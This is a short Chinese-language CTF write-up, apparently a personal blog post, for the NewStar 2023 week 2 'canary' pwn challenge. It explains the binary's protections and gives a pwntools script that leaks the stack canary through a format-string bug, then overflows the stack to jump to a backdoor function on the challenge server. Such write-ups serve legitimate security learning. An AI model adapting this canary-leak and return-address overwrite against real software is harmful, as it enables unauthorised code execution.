newstar2023 week2 - canary

RocketDev
  2023-10-01 12:00 2023-10-01 12:00 创建   2024-07-25 12:34:56 2024-07-25 12:34:56 更新      

文件分析

下载canary, NX on, PIE off, Canary on, RELRO full
ghidra分析为64位程序

解题思路

观察程序发现后门函数,且没有pie,首先利用格式化字符串漏洞打印出canary的值, 然后栈溢出补上canary后跳转到后门函数即可

EXPLOIT

1
2
3
4
5
6
7
8
9
10
11
12
13
14
from pwn import *
sh = remote('node4.buuoj.cn', 26476)

# payload 1
sh.sendline(b'%11$p') # get canary

sh.recvuntil(b'gift:\n') # skip
canary = int(sh.recvline()[:18], 16)

# payload 2
backdoor = 0x00401262
sh.sendline(b'0'*0x28 + p64(canary) + b'0'*8 + p64(backdoor))

sh.interactive()

Done.

  • 标题: newstar2023 week2 - canary
  • 作者: RocketDev
  • 创建于 : 2023-10-01 12:00:00
  • 更新于 : 2024-07-25 12:34:56
  • 链接: https://rocketmadev.github.io/2023/10/01/W2_canary/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
评论
目录
newstar2023 week2 - canary
  1. 文件分析
  2. 解题思路
  3. EXPLOIT